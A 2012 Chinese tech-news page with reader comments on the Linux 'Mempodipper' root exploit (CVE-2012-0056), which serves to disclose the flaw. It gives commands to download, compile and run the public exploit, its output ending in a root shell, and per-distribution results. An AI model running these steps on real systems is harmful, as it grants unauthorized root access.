	使用 Gmail/MSN/Yahoo/GitHub 登录 \| 注册 \| 我要提问 \| 发布开源软件 \| 新闻投递
	找到您想要的开源软件，分享和交流	Android客户端 iPhone客户端开源软件资讯

当前位置：资讯首页 » 综合资讯 » Linux Kernel

Linux 2.6.39 到 3.2.0 爆提权漏洞

16人收藏此新闻, | 新闻投递 William Herry 发布于： 2012年01月29日 (36评)

Linux 2.6.39 到 3.2.0 内核爆提权漏洞，普通用户可以通过运行特定代码获得 root 权限。

重现方法：

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

cc mempodipper.c

./a.out

在执行完毕后运行 whoami 来看是否执行成功。

已知发行版情况：

Debian Wheezy Testing: 成功。内核 3.1.0-1-amd64。Debian Security Tracker Report
Fedora 16: 失败。内核 3.2.1-3.fc16.x86_64
Arch Linux: 失败。内核 3.2.2-1-ARCH

如果你测试了，请将测试结果告诉我们！注意告诉我们发行版和 uname -a 的结果。

我机子上测试成功了

===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/20553/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# whoami
root

Ubuntu11.10

Linux desktop 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

Linux Kernel 的详细介绍：请点这里
Linux Kernel 的下载地址：请点这里

本文转载自: http://www.osmsg.com/2012/01/linux-2639-root-hole/

旧一篇：FFmpeg 0.10 发布 3个月前
新一篇：Mashable：Facebook估值1000亿美元物有所值 3个月前

相关资讯

相关讨论话题

X你也许会喜欢

Mandriva Linux 回归社区5天前
Linux Mint 13 RC 发布7天前
Hybryde Linux 1 发布，基于Ubuntu的桌面Linux...7天前

回到顶部 发表评论网友评论，共 36 条

1楼：Ophites 发表于 2012-01-29 13:43 回复此评论

版本帝不是那么好当的
2楼：Shadowmourne 发表于 2012-01-29 13:53 (非会员)

3.2.2-1.fc16.x86_64表示安全～
3楼：南宫傲 发表于 2012-01-29 14:07 回复此评论

大跃进吧
4楼：James Chen 发表于 2012-01-29 14:21 回复此评论

试了，成功 3.1.7
5楼：野草发表于 2012-01-29 14:38 回复此评论

我也弄了下~在UBUNTU11.10下成功~

6楼：野草发表于 2012-01-29 14:41 回复此评论

Linux zhiming 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i 686 i386 GNU/Linux

7楼：影子明 发表于 2012-01-29 14:56 回复此评论

说你安全我笑了有群白痴把你当宝一样捧着
8楼：2 发表于 2012-01-29 15:14 (非会员)

该送蛋糕了，送花圈也可以

9楼：廉西君 发表于 2012-01-29 15:28 回复此评论

引用来自“影子明”的评论

说你安全我笑了有群白痴把你当宝一样捧着

:-)

10楼：海旺发表于 2012-01-29 15:31 回复此评论

ubuntu10.04.3失败
Linux panquanyi-1 2.6.32-36-generic #79-Ubuntu SMP Tue Nov 8 22:29:53 UTC 2011 x86_64 GNU/Linux

ubuntu11.10 成功
Linux panquanyi-3 3.0.0-14-generic #23-Ubuntu SMP Mon Nov 21 20:28:43 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

11楼：hokim 发表于 2012-01-29 15:41 回复此评论

当你具备攻击的价值的时候，也就是你不再安全的时候
12楼：gundamfj 发表于 2012-01-29 16:19 回复此评论

arch 3.2.1未成功

13楼：往事白云边 发表于 2012-01-29 16:28 (非会员)

我用 cc mempodipper.c的时候提示

/tmp/ccvzti9n.o(.text+0x1c8): In function `ptrace_address':
: undefined reference to `pipe2'
collect2: ld returned 1 exit status

14楼：wangbruce 发表于 2012-01-29 16:37 回复此评论

debian 6
2.6.26-2-amd64

cc mempodipper.c
/tmp/ccUiQVi6.o: In function `ptrace_address':
mempodipper.c:(.text+0x23b): undefined reference to `pipe2'
collect2: ld returned 1 exit status

15楼：往事白云边 发表于 2012-01-29 16:41 回复此评论

centos 4.8 缺少啥条件才不会出下面的错？

/tmp/ccvzti9n.o(.text+0x1c8): In function `ptrace_address':
: undefined reference to `pipe2'
collect2: ld returned 1 exit status

16楼：fei 发表于 2012-01-29 16:44 回复此评论

===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.

17楼：fei 发表于 2012-01-29 16:48 回复此评论

[+] Error message written. Single stepping to find address.
到这没反映了。需要等多长时间？

18楼：Zone 发表于 2012-01-29 17:04 回复此评论

Linux Mr-Zone 2.6.32-37-generic #81-Ubuntu SMP Fri Dec 2 20:35:14 UTC 2011 i686 GNU/Linux

失败

19楼：後方之水 发表于 2012-01-29 17:38 回复此评论

Linux timemars 3.2.0 #1 SMP Thu Jan 5 12:54:20 CST 2012 x86_64，成功了
20楼：Rock_Agen 发表于 2012-01-29 17:53 回复此评论

这种bug适当出点,会提高关注度的...